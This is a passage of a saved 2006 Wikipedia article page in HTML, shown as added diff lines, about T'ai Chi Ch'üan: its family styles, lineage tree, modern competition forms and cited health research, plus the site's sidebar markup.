history">edit</a>]</div> + +<p><a name="Styles_and_history" id="Styles_and_history"></a></p> +<h2>Styles and history</h2> +<p>There are five major styles of T'ai Chi Ch'üan, each named after the Chinese family that teaches (or taught) it:</p> +<ul> +<li><b><a href="/wiki/Chen_style_Tai_Chi_Chuan" title="Chen style Tai Chi Chuan">Chen style</a></b> (??) and its close cousin <b><a href="/w/index.php?title=Zhaobao_style_T%27ai_Chi_Ch%27uan&action=edit" class="new" title="Zhaobao style T'ai Chi Ch'uan">Zhao Bao Style</a></b> (?????)</li> +<li><b><a href="/wiki/Yang_style_T%27ai_Chi_Ch%27uan" title="Yang style T'ai Chi Ch'uan">Yang style</a></b> (??)</li> + +<li><b><a href="/wiki/Wu/Hao_style_T%27ai_Chi_Ch%27uan" title="Wu/Hao style T'ai Chi Ch'uan">Wu or Wu/Hao style of Wu Yu-hsiang</a></b> (??)</li> +<li><b><a href="/wiki/Wu_style_T%27ai_Chi_Ch%27uan" title="Wu style T'ai Chi Ch'uan">Wu style of Wu Ch'uan-yü and Wu Chien-ch'uan</a></b> (??)</li> +<li><b><a href="/wiki/Sun_style_T%27ai_Chi_Ch%27uan" title="Sun style T'ai Chi Ch'uan">Sun style</a></b> (??)</li> +</ul> +<p>The order of seniority is as listed above. The order of popularity is Yang, Wu, Chen, Sun, and Wu/Hao. The first five major family styles share much underlying theory, but differ in their approaches to training.</p> +<p>In the modern world there are now dozens of new styles, hybrid styles and offshoots of the main styles, but the five family schools are the groups recognised by the international community as being orthodox. For example, there are <i>several</i> groups teaching what they call <a href="/wiki/Wudang_Tai_Chi_Chuan" title="Wudang Tai Chi Chuan">Wu Tang style T'ai Chi Ch'üan (??????)</a>. The best known modern style going by the name <i>Wu Tang</i> has gained some publicity internationally, especially in the <a href="/wiki/United_Kingdom" title="United Kingdom">UK</a> and <a href="/wiki/Europe" title="Europe">Europe</a>, but was originally taught by a senior student of the Wu (?) style.</p> + +<p>The designation <i><a href="/wiki/Wudangquan" title="Wudangquan">Wu Tang Ch'üan</a></i> is also used to broadly distinguish <i>internal</i> or <i>nei chia</i> martial arts (said to be a specialty of the <a href="/wiki/Monasteries" title="Monasteries">monasteries</a> at <a href="/wiki/Wudangshan" title="Wudangshan">Wu Tang Shan</a>) from what are known as the <i>external</i> or <i>wei chia</i> styles based on <i><a href="/w/index.php?title=Shaolinquan_kung_fu&action=edit" class="new" title="Shaolinquan kung fu">Shaolinquan kung fu</a></i>, although that distinction is sometimes disputed by individual schools. In this broad sense, among many T'ai Chi schools <i>all</i> styles of T'ai Chi (as well as related arts such as <a href="/wiki/Bagua_zhang" title="Bagua zhang">Pa Kua Chang</a> and <a href="/wiki/Hsing_Yi" title="Hsing Yi">Hsing-i Ch'üan</a>) are therefore considered to be "Wu Tang style" martial arts. The schools that designate themselves "Wu Tang style" relative to the family styles mentioned above mostly claim to teach an "original style" they say was formulated by a Taoist monk called <a href="/wiki/Zhang_Sanfeng" title="Zhang Sanfeng">Zhang Sanfeng</a> and taught by him in the Taoist monasteries at Wu Tang Shan. Some consider that what is practised under that name today may be a modern back-formation based on stories and popular veneration of Zhang Sanfeng (see below) as well as the martial fame of the Wu Tang monastery (there are many other martial art styles historically associated with Wu Tang besides T'ai Chi).</p> + +<p>When tracing T'ai Chi Ch'üan's formative influences to <a href="/wiki/Taoist" title="Taoist">Taoist</a> and <a href="/wiki/Buddhist" title="Buddhist">Buddhist</a> monasteries, one has little more to go on than legendary tales from a modern historical perspective, but T'ai Chi Ch'üan's practical connection to and dependence upon the theories of <a href="/wiki/Song_dynasty" title="Song dynasty">Sung dynasty</a> <a href="/wiki/Neo-Confucianism" title="Neo-Confucianism">Neo-Confucianism</a> (a conscious synthesis of Taoist, Buddhist and <a href="/wiki/Confucian" title="Confucian">Confucian</a> traditions, esp. the teachings of <a href="/wiki/Mencius" title="Mencius">Mencius</a>) is readily apparent to its practitioners. The philosophical and political landscape of that time in Chinese history is fairly well documented, even if the origin of the art later to become known as T'ai Chi Ch'üan in it is not. T'ai Chi Ch'üan's theories and practice are therefore believed by some schools to have been formulated by the Taoist monk <a href="/wiki/Zhang_Sanfeng" title="Zhang Sanfeng">Zhang Sanfeng</a> in the 12th century, a time frame fitting well with when the principles of the Neo-Confucian school were making themselves felt in Chinese intellectual life. Therefore the didactic story is told that Zhang Sanfeng as a young man studied <a href="/wiki/Tao_Yin" title="Tao Yin">Tao Yin</a> (??, <a href="/wiki/Pinyin" title="Pinyin">Pinyin</a> daoyin) breathing exercises from his Taoist teachers and martial arts at the Buddhist Shaolin monastery, eventually combining the martial forms and breathing exercises to formulate the soft or internal principles we associate with T'ai Chi Ch'üan and related martial arts. Its subsequent fame attributed to his teaching, Wu Tang monastery was known thereafter as an important martial center for many centuries, its many styles of internal <a href="/wiki/Kung_fu" title="Kung fu">kung fu</a> preserved and refined at various Taoist temples.</p> + +<div class="editsection" style="float:right;margin-left:5px;">[<a href="/w/index.php?title=Tai_Chi_Chuan&action=edit&section=4" title="Edit section: Family tree">edit</a>]</div> +<p><a name="Family_tree" id="Family_tree"></a></p> +<h3>Family tree</h3> +<p>This family tree is not comprehensive.</p> +<pre> +<b>LEGENDARY FIGURES</b> + | +<a href="/wiki/Zhang_Sanfeng" title="Zhang Sanfeng">Zhang Sanfeng</a>* +circa 12th century +<a href="/wiki/Nei_chia" title="Nei chia">NEI CHIA</a> + + | +<a href="/w/index.php?title=Wang_Zongyue&action=edit" class="new" title="Wang Zongyue">Wang Zongyue</a>* +T'AI CHI CH'ÜAN + | +<b>THE 5 MAJOR CLASSICAL FAMILY STYLES</b> + | +Chen Wangting +1600-1680 9th generation Chen +<a href="/wiki/Chen_style_Tai_Chi_Chuan" title="Chen style Tai Chi Chuan">CHEN STYLE</a> + | + +-------------------------------------------------------------------+ + | | +<a href="/w/index.php?title=Chen_Changxing&action=edit" class="new" title="Chen Changxing">Chen Changxing</a> <a href="/w/index.php?title=Chen_Youben&action=edit" class="new" title="Chen Youben">Chen Youben</a> +1771-1853 14th generation Chen circa 1800s 14th generation Chen +Chen Old Frame Chen New Frame + | | + +<a href="/wiki/Yang_Lu-ch%27an" title="Yang Lu-ch'an">Yang Lu-ch'an</a> <a href="/w/index.php?title=Chen_Qingping&action=edit" class="new" title="Chen Qingping">Chen Qingping</a> +1799-1872 1795-1868 +<a href="/wiki/Yang_style_Tai_Chi_Chuan" title="Yang style Tai Chi Chuan">YANG STYLE</a> Chen Small Frame, Zhao Bao Frame + | | + +---------------------------------+-----------------------------+ | + | | | | +<a href="/wiki/Yang_Pan-hou" title="Yang Pan-hou">Yang Pan-hou</a> <a href="/wiki/Yang_Chien-hou" title="Yang Chien-hou">Yang Chien-hou</a> <a href="/w/index.php?title=Wu_Yu-hsiang&action=edit" class="new" title="Wu Yu-hsiang">Wu Yu-hsiang</a> +1837-1892 1839-1917 1812-1880 +Yang Small Frame | <a href="/wiki/Wu/Hao_style_T%27ai_Chi_Ch%27uan" title="Wu/Hao style T'ai Chi Ch'uan">WU/HAO STYLE</a> + + | +-----------------+ | + | | | | +<a href="/wiki/Wu_Ch%27uan-y%C3%BC" title="Wu Ch'uan-yü">Wu Ch'uan-yü</a> <a href="/wiki/Yang_Shao-hou" title="Yang Shao-hou">Yang Shao-hou</a> <a href="/wiki/Yang_Ch%27eng-fu" title="Yang Ch'eng-fu">Yang Ch'eng-fu</a> <a href="/w/index.php?title=Li_I-y%C3%BC&action=edit" class="new" title="Li I-yü">Li I-yü</a> +1834-1902 1862-1930 1883-1936 1832-1892 + | Yang Small Frame <a href="/wiki/103_form_Yang_family_T%27ai_Chi_Ch%27uan" title="103 form Yang family T'ai Chi Ch'uan">Yang Big Frame</a> | +<a href="/wiki/Wu_Chien-ch%27%C3%BCan" title="Wu Chien-ch'üan">Wu Chien-ch'üan</a> | <a href="/wiki/Hao_Wei-chen" title="Hao Wei-chen">Hao Wei-chen</a> + +1870-1942 <a href="/wiki/Yang_Shou-chung" title="Yang Shou-chung">Yang Shou-chung</a> 1849-1920 +<a href="/wiki/Wu_style_T%27ai_Chi_Ch%27uan" title="Wu style T'ai Chi Ch'uan">WU STYLE</a> 1910-1985 | +<a href="/wiki/108_form_Wu_family_T%27ai_Chi_Ch%27uan" title="108 form Wu family T'ai Chi Ch'uan">108 Form</a> | + | <a href="/wiki/Sun_Lu-t%27ang" title="Sun Lu-t'ang">Sun Lu-t'ang</a> +<a href="/wiki/Wu_Kung-i" title="Wu Kung-i">Wu Kung-i</a> 1861-1932 +1900-1970 <a href="/wiki/Sun_style_T%27ai_Chi_Ch%27uan" title="Sun style T'ai Chi Ch'uan">SUN STYLE</a> + + | | +<a href="/w/index.php?title=Wu_Ta-kuei&action=edit" class="new" title="Wu Ta-kuei">Wu Ta-kuei</a> <a href="/w/index.php?title=Sun_Hsing-i&action=edit" class="new" title="Sun Hsing-i">Sun Hsing-i</a> +1923-1970 1891-1929 + +<b>MODERN FORMS</b> + +from Yang Ch`eng-fu + | + | + | + +--------------+ + | | + <a href="/wiki/Cheng_Man-ch%27ing" title="Cheng Man-ch'ing">Cheng Man-ch'ing</a> | + 1901-1975 | + Short (37) Form | + | + Chinese Sports Commission + 1956 + Beijing <a href="/wiki/24_Form" title="24 Form">24 Form</a> + . + . + 1989 + <a href="/wiki/42_Form_%28Competition_Form%29_T%27ai_Chi_Ch%27uan" title="42 Form (Competition Form) T'ai Chi Ch'uan">42 Competition Form</a> + + (<a href="/wiki/Wushu" title="Wushu">Wushu</a> competition form combined from Sun, Wu, Chen, and Yang styles) +</pre> +<div class="editsection" style="float:right;margin-left:5px;">[<a href="/w/index.php?title=Tai_Chi_Chuan&action=edit&section=5" title="Edit section: Notes to Family tree table">edit</a>]</div> +<p><a name="Notes_to_Family_tree_table" id="Notes_to_Family_tree_table"></a></p> +<h3>Notes to Family tree table</h3> +<p>Names denoted by an asterisk are legendary or semilegendary figures in the lineage, which means their involvement in the lineage, while accepted by most of the major schools, isn't independently verifiable from known historical records.</p> +<p>The Cheng Man-ch'ing and <a href="/w/index.php?title=Chinese_Sports_Commission&action=edit" class="new" title="Chinese Sports Commission">Chinese Sports Commission</a> short forms are said to be derived from Yang family forms, but neither are recognized as Yang family T'ai Chi Ch'üan by current Yang family teachers. The Chen, Yang and Wu families are now promoting their own shortened demonstration forms for competitive purposes.</p> + +<div class="editsection" style="float:right;margin-left:5px;">[<a href="/w/index.php?title=Tai_Chi_Chuan&action=edit&section=6" title="Edit section: Modern T'ai Chi">edit</a>]</div> +<p><a name="Modern_T.27ai_Chi" id="Modern_T.27ai_Chi"></a></p> +<h2>Modern T'ai Chi</h2> +<div class="thumb tright"> +<div style="width:352px;"><a href="/wiki/Image:Taichi_shanghai_bund_2005.jpg" class="internal" title="Yang style in Shanghai"><img src="http://upload.wikimedia.org/wikipedia/commons/thumb/9/9f/Taichi_shanghai_bund_2005.jpg/350px-Taichi_shanghai_bund_2005.jpg" alt="Yang style in Shanghai" width="350" height="263" longdesc="/wiki/Image:Taichi_shanghai_bund_2005.jpg" /></a> +<div class="thumbcaption"> +<div class="magnify" style="float:right"><a href="/wiki/Image:Taichi_shanghai_bund_2005.jpg" class="internal" title="Enlarge"><img src="/skins-1.5/common/images/magnify-clip.png" width="15" height="11" alt="Enlarge" /></a></div> +Yang style in Shanghai</div> +</div> +</div> +<p>T'ai Chi has become very popular in the last twenty years or so, as the <a href="/wiki/Baby_boomers" title="Baby boomers">baby boomers</a> age and T'ai Chi's reputation for ameliorating the effects of aging becomes more well-known. Hospitals, clinics, community and senior centers are all hosting T'ai Chi classes in communities around the world. As a result of this popularity, there has been some divergence between those who say they practice T'ai Chi primarily for fighting, those who practice it for its <a href="/wiki/Aesthetic" title="Aesthetic">aesthetic</a> appeal (as in the shortened, modern, theatrical "Taijiquan" forms of <a href="/wiki/Wushu" title="Wushu">wushu</a>, see below), and those who are more interested in its benefits to physical and mental health. The wushu aspect is primarily for show; the forms taught for those purposes are designed to earn points in competition and are mostly unconcerned with either health maintenance or martial ability. More traditional stylists still see the two aspects of health and martial arts as equally necessary pieces of the puzzle, the <i>yin</i> and <i>yang</i> of T'ai Chi Ch'üan. The T'ai Chi "family" schools therefore still present their teachings in a martial art context even though the majority of their students nowadays profess that they are primarily interested in training for the claimed health benefits.</p> + +<p>Along with <a href="/wiki/Yoga" title="Yoga">Yoga</a>, it is one of the fastest growing fitness and health maintenance activities, in terms of numbers of students enrolling in classes. Since there is no universal certification process and most Westerners haven't seen very much T'ai Chi and don't know what to look for, practically anyone can learn or even make up a few moves and call themselves a teacher. This is especially prevalent in the <a href="/wiki/New_Age" title="New Age">New Age</a> community. Relatively few of these teachers even know that there are martial applications to the T'ai Chi forms. Those who do know that it is a martial art usually don't teach martially themselves. If they do teach self-defense, it is often a mixture of motions which the teachers think look like T'ai Chi Ch'üan with some other system. This is especially evident in schools located outside of China. While this phenomenon may have made some external aspects of T'ai Chi available for a wider audience, the traditional T'ai Chi family schools see the martial focus as a fundamental part of their training, both for health <i>and</i> self-defense purposes. They claim that while the students may not need to practice martial applications themselves to derive a benefit from T'ai Chi training, they assert that T'ai Chi teachers at least should know the martial applications to ensure that the movements they teach are done correctly and safely by their students. Also, working on the ability to protect oneself from physical attack (one of the most stressful things that can happen to a person) certainly falls under the category of complete "health maintenance." For these reasons they claim that a school not teaching those aspects somewhere in their syllabus cannot be said to be actually teaching the art itself, and will be much less likely to be able to reproduce the full health benefits that made T'ai Chi's reputation in the first place.</p> +<div class="editsection" style="float:right;margin-left:5px;">[<a href="/w/index.php?title=Tai_Chi_Chuan&action=edit&section=7" title="Edit section: Modern forms">edit</a>]</div> +<p><a name="Modern_forms" id="Modern_forms"></a></p> +<h3>Modern forms</h3> + +<div class="thumb tright"> +<div style="width:352px;"><a href="/wiki/Image:Tai_Chi_fans.jpg" class="internal" title="Women practicing non-martial T'ai Chi in Chinatown (New York City, New York, USA)."><img src="http://upload.wikimedia.org/wikipedia/en/thumb/a/ad/Tai_Chi_fans.jpg/350px-Tai_Chi_fans.jpg" alt="Women practicing non-martial T'ai Chi in Chinatown (New York City, New York, USA)." width="350" height="201" longdesc="/wiki/Image:Tai_Chi_fans.jpg" /></a> +<div class="thumbcaption"> +<div class="magnify" style="float:right"><a href="/wiki/Image:Tai_Chi_fans.jpg" class="internal" title="Enlarge"><img src="/skins-1.5/common/images/magnify-clip.png" width="15" height="11" alt="Enlarge" /></a></div> +Women practicing non-martial T'ai Chi in <a href="/wiki/Chinatown_%28Manhattan%29" title="Chinatown (Manhattan)">Chinatown</a> (<a href="/wiki/New_York_City" title="New York City">New York City</a>, <a href="/wiki/New_York" title="New York">New York</a>, <a href="/wiki/USA" title="USA">USA</a>).</div> +</div> +</div> + +<p>In order to standardize T'ai Chi Ch'üan for wushu tournament judging, and because many of the family T'ai Chi Ch'üan teachers had either moved out of China or had been forced to stop teaching after the <a href="/wiki/Chinese_Civil_War" title="Chinese Civil War">Communist regime was established</a> in <a href="/wiki/1949" title="1949">1949</a>, the government sponsored Chinese Sports Committee brought together four of their wushu teachers to truncate the Yang family hand form to <a href="/wiki/24_Form_%28Simplified_Form%29_T%27ai_Chi_Ch%27uan" title="24 Form (Simplified Form) T'ai Chi Ch'uan">24 postures</a> in <a href="/wiki/1956" title="1956">1956</a>. They wanted to somehow retain the look of T'ai Chi Ch'üan but make an easy to remember routine that was less difficult to teach and much less difficult to learn than longer (generally 88 to 108 posture) classical solo hand forms. In <a href="/wiki/1976" title="1976">1976</a>, they developed a slightly longer form also for the purposes of demonstration that still didn't involve the complete memory, balance and coordination requirements of the traditional forms. This was a combination form, the <i>Combined 48 Forms</i> that were created by three wushu coaches headed by Professor Men Hui Feng. The combined forms were created based on simplifying and combining some features of the classical forms from four of the original styles; Ch'en, Yang, Wu, and Sun. Even though shorter modern forms don't have the conditioning benefits of the classical forms, the idea was to take what they felt were distinctive cosmetic features of these styles and to express them in a shorter time for purposes of competition.</p> + +<p>As T'ai Chi again became popular on the Mainland, competitive forms were developed to be completed within a 6 minute time limit. In the late <a href="/wiki/1980s" title="1980s">1980s</a>, the Chinese Sports Committee standardized many different competition forms. It had developed sets said to represent the four major styles as well as combined forms. These five sets of forms were created by different teams, and later approved by a committee of wushu coaches in China. All sets of forms thus created were named after their style, e.g., the Ch'en Style National Competition Form is the <i>56 Forms</i>, and so on. The combined forms are <i>The 42 Form</i> or simply the <i>Competition Form</i>, as it is known in China. In the 11th <a href="/wiki/Asian_Games" title="Asian Games">Asian Games</a> of <a href="/wiki/1990" title="1990">1990</a>, wushu was included as an item for competition for the first time with the 42 Form being chosen to represent T'ai Chi. The International Wushu Federation (<a href="/w/index.php?title=IWUF&action=edit" class="new" title="IWUF">IWUF</a>) has applied for wushu to be part of the <a href="/wiki/Olympic_games" title="Olympic games">Olympic games</a>. If accepted, it is likely that T'ai Chi and wushu will be represented as demonstration events in <a href="/wiki/2008" title="2008">2008</a>.</p> + +<p>Representatives of the original T'ai Chi families do not teach the forms developed by the Chinese Sports Committee. T'ai Chi Ch'üan has historically been seen by them as a martial art, not a sport, with competitions mostly entered as a hobby or to promote one's school publicly, but with little bearing on measuring actual accomplishment in the art. Their criticisms of modern forms include that the modern, "government" routines have no standardized, internally consistent training requirements. Also, that people studying competition forms rarely train pushing hands or other power generation trainings vital to learning the martial applications of T'ai Chi Ch'üan and thereby lack the <a href="/wiki/Quality_control" title="Quality control">quality control</a> traditional teachers maintain is essential for achieving the full benefits from both the health and the martial aspect of traditional T'ai Chi training.</p> +<div class="editsection" style="float:right;margin-left:5px;">[<a href="/w/index.php?title=Tai_Chi_Chuan&action=edit&section=8" title="Edit section: Health benefits">edit</a>]</div> +<p><a name="Health_benefits" id="Health_benefits"></a></p> +<h2>Health benefits</h2> +<p>Researchers have found that long-term T'ai Chi practice had favorable effects on the promotion of balance control, flexibility and cardiovascular fitness and reduced the risk of falls in elders. The studies also reported reduced pain, stress and anxiety in healthy subjects. Other studies have indicated improved cardiovascular and respiratory function in healthy subjects as well as those who had undergone coronary artery bypass surgery. Patients also benefited from T'ai Chi who suffered from heart failure, high blood pressure, heart attacks, arthritis and multiple sclerosis.</p> +<p>T'ai Chi has also been shown to reduce the symptoms of young Attention Deficit and Hyperactivity Disorder (<a href="/wiki/ADHD" title="ADHD">ADHD</a>) sufferers. T'ai Chi's gentle, low impact, movements surprisingly burn more calories than surfing and nearly as many as downhill skiing. T'ai Chi also boosts aspects of the immune system's function very significantly, and has been shown to reduce the incidence of anxiety, depression, and overall mood disturbance. (See research citations listed below.)</p> + +<p>A pilot study has found evidence that T'ai Chi and related qigong helps reduce the severity of <a href="/wiki/Diabetes" title="Diabetes">diabetes</a>.<a href="http://www.abc.net.au/pm/content/2005/s1535304.htm" class="external autonumber" title="http://www.abc.net.au/pm/content/2005/s1535304.htm">[1]</a></p> +<div class="editsection" style="float:right;margin-left:5px;">[<a href="/w/index.php?title=Tai_Chi_Chuan&action=edit&section=9" title="Edit section: Citations to medical research">edit</a>]</div> +<p><a name="Citations_to_medical_research" id="Citations_to_medical_research"></a></p> +<h3>Citations to medical research</h3> +<ul> +<li>Wolf SL, Sattin RW, Kutner M. Intense T'ai Chi exercise training and fall occurrences in older, transitionally frail adults: a randomized, controlled trial. J Am Geriatr Soc. 2003 Dec; 51(12): 1693-701. <a href="http://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Retrieve&db=pubmed&dopt=Abstract&list_uids=14687346" class="external" title="http://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Retrieve&db=pubmed&dopt=Abstract&list_uids=14687346">PMID 14687346</a></li> +<li>Wang C, Collet JP, Lau J. The effect of Tai Chi on health outcomes in patients with chronic conditions: a <a href="/wiki/Systematic_review" title="Systematic review">systematic review</a>. Arch Intern Med. 2004 Mar 8;164(5):493-501. <a href="http://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Retrieve&db=pubmed&dopt=Abstract&list_uids=15006825" class="external" title="http://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Retrieve&db=pubmed&dopt=Abstract&list_uids=15006825">PMID 15006825</a></li> + +<li>Search a listing of articles relating to the FICSIT trials and T'ai Chi <a href="http://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Select+from+History&db=pubmed&query_key=3" class="external autonumber" title="http://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Select+from+History&db=pubmed&query_key=3">[2]</a></li> +<li>Hernandez-Reif, M., Field, T.M., & Thimas, E. (2001). Attention deficit hyperactivity disorder: benefits from Tai Chi. Journal of Bodywork & Movement Therapies, 5(2):120-3, 2001 Apr, 5(23 ref), 120-123</li> +<li>Calorie Burning Chart <a href="http://www.nutristrategy.com/activitylist3.htm" class="external autonumber" title="http://www.nutristrategy.com/activitylist3.htm">[3]</a></li> +<li>Tai Chi boosts T-Cell counts in immune system <a href="http://www.acupuncturetoday.com/archives2003/nov/11taichi.html" class="external autonumber" title="http://www.acupuncturetoday.com/archives2003/nov/11taichi.html">[4]</a></li> +<li>Tai Chi, depression, anxiety, and mood disturbance (American Psychological Association) Journal of Psychosomatic Research, 1989 Vol 33 (2) 197-206</li> + +<li>A comprehensive listing of Tai Chi medical research links <a href="http://www.worldtaichiday.org/WTCQDHlthBenft.html" class="external autonumber" title="http://www.worldtaichiday.org/WTCQDHlthBenft.html">[5]</a></li> +<li>References to medical publications <a href="http://www.worldtaichiday.org/HeadlineNews.html" class="external autonumber" title="http://www.worldtaichiday.org/HeadlineNews.html">[6]</a></li> +<li><a href="http://www.abc.net.au/pm/content/2005/s1535304.htm" class="external text" title="http://www.abc.net.au/pm/content/2005/s1535304.htm">Tai Chi a promising remedy for diabetes</a>, <i>Australian Broadcasting Corporation</i>, 20 December, 2005 - Pilot study of Qigong and tai chi in diabetes sufferers.</li> +<li>Health Research Articles on "Tai Chi as Health Therapy" for many issues, i.e. ADHD, Cardiac Health & Rehabilitation, Diabetes, High Blood Pressure, Menopause, Bone Loss, Weight Loss, etc.<a href="http://www.worldtaichiday.org/LIBRARYArticles/LIBRARYTaiChiArticlesMenu.html" class="external autonumber" title="http://www.worldtaichiday.org/LIBRARYArticles/LIBRARYTaiChiArticlesMenu.html">[7]</a></li> +</ul> + +<div class="editsection" style="float:right;margin-left:5px;">[<a href="/w/index.php?title=Tai_Chi_Chuan&action=edit&section=10" title="Edit section: See also">edit</a>]</div> +<p><a name="See_also" id="See_also"></a></p> +<h2>See also</h2> +<ul> +<li><a href="/wiki/Jing_%28TCM%29" title="Jing (TCM)">Jing</a></li> +<li><a href="/wiki/List_of_Tai_Chi_Chuan_forms" title="List of Tai Chi Chuan forms">List of Tai Chi Chuan forms</a></li> +<li><a href="/wiki/Nei_Jin" title="Nei Jin">nei chin</a></li> +<li><a href="/wiki/Silk_reeling" title="Silk reeling">Silk reeling</a></li> +<li><a href="/wiki/World_Tai_Chi_and_Qigong_Day" title="World Tai Chi and Qigong Day">World Tai Chi and Qigong Day</a></li> + +</ul> +<div class="editsection" style="float:right;margin-left:5px;">[<a href="/w/index.php?title=Tai_Chi_Chuan&action=edit&section=11" title="Edit section: External links">edit</a>]</div> +<p><a name="External_links" id="External_links"></a></p> +<h2>External links</h2> +<ul> +<li><a href="http://www.chenxiaowang.com/" class="external text" title="http://www.chenxiaowang.com/">A Chen Family Website</a></li> +<li><a href="http://www.yangfamilytaichi.com/" class="external text" title="http://www.yangfamilytaichi.com/">Yang Family Website</a></li> +<li><a href="http://www.wustyle.com/" class="external text" title="http://www.wustyle.com/">Wu Chien-ch'üan Family Website</a></li> +<li><a href="http://www.fushengyuan-taichi.com.au/" class="external text" title="http://www.fushengyuan-taichi.com.au/">Fu Family Website</a></li> + +<li><a href="http://www.itcca.org/" class="external text" title="http://www.itcca.org/">Yang family disciple's website (ITCCA)</a></li> +<li><a href="http://www.dongtaichi.com/" class="external text" title="http://www.dongtaichi.com/">Dong T'ai Chi</a></li> +<li><a href="http://www.leefamilystyle.com/" class="external text" title="http://www.leefamilystyle.com/">UK website for Li style, popular in Europe</a></li> +<li><a href="http://www.chen-taiji.com/mambo/" class="external text" title="http://www.chen-taiji.com/mambo/">The World of Taijiquan</a></li> +<li><a href="http://www.scheele.org/lee/tcclinks.html" class="external text" title="http://www.scheele.org/lee/tcclinks.html">Lee Scheele's Links to T'ai Chi Ch'uan Web Sites</a></li> +<li><a href="http://news.bbc.co.uk/1/hi/health/3543907.stm" class="external text" title="http://news.bbc.co.uk/1/hi/health/3543907.stm">BBC article</a></li> +<li><a href="http://www.acupuncturetoday.com/archives2004/jul/07taichi.html" class="external text" title="http://www.acupuncturetoday.com/archives2004/jul/07taichi.html">Tai Chi: Good for the Mind, Good for the Body</a></li> +<li><a href="http://www.taichiunion.com/" class="external text" title="http://www.taichiunion.com/">Tai Chi Chuan Union for Great Britian: The largest collective of independent Tai Chi Chuan Instructors in the British Isles</a></li> +</ul> + + +<!-- Saved in parser cache with key enwiki:pcache:idhash:30690-0!0!0!1!!en!2 and timestamp 20060722121412 --> +<div class="printfooter"> +Retrieved from "<a href="http://en.wikipedia.org/wiki/Tai_Chi_Chuan">http://en.wikipedia.org/wiki/Tai_Chi_Chuan</a>"</div> + <div id="catlinks"><p class='catlinks'><a href="/w/index.php?title=Special:Categories&article=Tai_Chi_Chuan" title="Special:Categories">Categories</a>: <span dir='ltr'><a href="/wiki/Category:Chinese_martial_arts" title="Category:Chinese martial arts">Chinese martial arts</a></span> | <span dir='ltr'><a href="/wiki/Category:T%27ai_Chi_Ch%27uan" title="Category:T'ai Chi Ch'uan">T'ai Chi Ch'uan</a></span> | <span dir='ltr'><a href="/wiki/Category:Taoism" title="Category:Taoism">Taoism</a></span> | <span dir='ltr'><a href="/wiki/Category:Meditation" title="Category:Meditation">Meditation</a></span> | <span dir='ltr'><a href="/wiki/Category:Mind-body_interventions" title="Category:Mind-body interventions">Mind-body interventions</a></span> | <span dir='ltr'><a href="/wiki/Category:Traditional_Chinese_medicine" title="Category:Traditional Chinese medicine">Traditional Chinese medicine</a></span></p></div> <!-- end content --> + + <div class="visualClear"></div> + </div> + </div> + </div> + <div id="column-one"> + <div id="p-cactions" class="portlet"> + <h5>Views</h5> + <ul> + + <li id="ca-nstab-main" class="selected"><a href="/wiki/Tai_Chi_Chuan">Article</a></li> + <li id="ca-talk"><a href="/wiki/Talk:Tai_Chi_Chuan">Discussion</a></li> + <li id="ca-edit"><a href="/w/index.php?title=Tai_Chi_Chuan&action=edit">Edit this page</a></li> + <li id="ca-history"><a href="/w/index.php?title=Tai_Chi_Chuan&action=history">History</a></li> + <li id="ca-protect"><a href="/w/index.php?title=Tai_Chi_Chuan&action=protect">Protect</a></li> + <li id="ca-delete"><a href="/w/index.php?title=Tai_Chi_Chuan&action=delete">Delete</a></li> + + <li id="ca-move"><a href="/w/index.php?title=Special:Movepage&target=Tai_Chi_Chuan">Move</a></li> + <li id="ca-unwatch"><a href="/w/index.php?title=Tai_Chi_Chuan&action=unwatch">Unwatch</a></li> + </ul> + </div> + <div class="portlet" id="p-personal"> + <h5>Personal tools</h5> + <div class="pBody"> + + <ul> + <li id="pt-userpage"><a href="/wiki/User:Edward_Z._Yang">Edward Z. Yang</a></li> + <li id="pt-mytalk"><a href="/wiki/User_talk:Edward_Z._Yang">My talk</a></li> + <li id="pt-preferences"><a href="/wiki/Special:Preferences">My preferences</a></li> + <li id="pt-watchlist"><a href="/wiki/Special:Watchlist">My watchlist</a></li> + <li id="pt-mycontris"><a href="/wiki/Special:Contributions/Edward_Z._Yang">My contributions</a></li> + + <li id="pt-logout"><a href="/w/index.php?title=Special:Userlogout&returnto=Tai_Chi_Chuan">Log out</a></li> + </ul> + </div> + </div> + <div class="portlet" id="p-logo"> + <a style="background-image: url(/images/wiki-en.png);" href="/wiki/Main_Page" title="Main Page"></a> + </div> + <script type="text/javascript"> if (window.isMSIE55) fixalpha(); </script> + + <div class='portlet' id='p-navigation'> + <h5>Navigation</h5> + <div class='pBody'> + <ul> + <li id="n-mainpage"><a href="/wiki/Main_Page">Main Page</a></li> + <li id="n-portal"><a href="/wiki/Wikipedia:Community_Portal">Community Portal</a></li> + <li id="n-Featured-articles"><a href="/wiki/Wikipedia:Featured_articles">Featured articles</a></li> + + <li id="n-currentevents"><a href="/wiki/Portal:Current_events">Current events</a></li> + <li id="n-recentchanges"><a href="/wiki/Special:Recentchanges">Recent changes</a></li> + <li id="n-randompage"><a href="/wiki/Special:Random">Random article</a></li> + <li id="n-help"><a href="/wiki/Help:Contents">Help</a></li> + <li id="n-contact"><a href="/wiki/Wikipedia:Contact_us">Contact Wikipedia</a></li> + <li id="n-sitesupport"><a href="http://wikimediafoundation.org/wiki/Fundraising#Donation_methods">Donations</a></li> + + </ul> + </div> + </div> + <div id="p-search" class="portlet"> + <h5><label for="searchInput">Search</label></h5> + <div id="searchBody" class="pBody"> + <form action="/wiki/Special:Search" id="searchform"><div> + <input id="searchInput" name="search" type="text" accesskey="f" value="" /> + + <input type='submit' name="go" class="searchButton" id="searchGoButton" value="Go" /> + <input type='submit' name="fulltext" class="searchButton" value="Search" /> + </div></form> + </div> + </div> + <div class="portlet" id="p-tb"> + <h5>Toolbox</h5> + <div class="pBody"> + + <ul> + <li id="t-whatlinkshere"><a href="/w/index.php?title=Special:Whatlinkshere&target=Tai_Chi_Chuan">What links here</a></li> + <li id="t-recentchangeslinked"><a href="/w/index.php?title=Special:Recentchangeslinked&target=Tai_Chi_Chuan">Related changes</a></li> +<li id="t-upload"><a href="/wiki/Special:Upload">Upload file</a></li> +<li id="t-specialpages"><a href="/wiki/Special:Specialpages">Special pages</a></li> + <li id="t-print"><a href="/w/index.php?title=Tai_Chi_Chuan&printable=yes">Printable version</a></li> <li id="t-permalink"><a 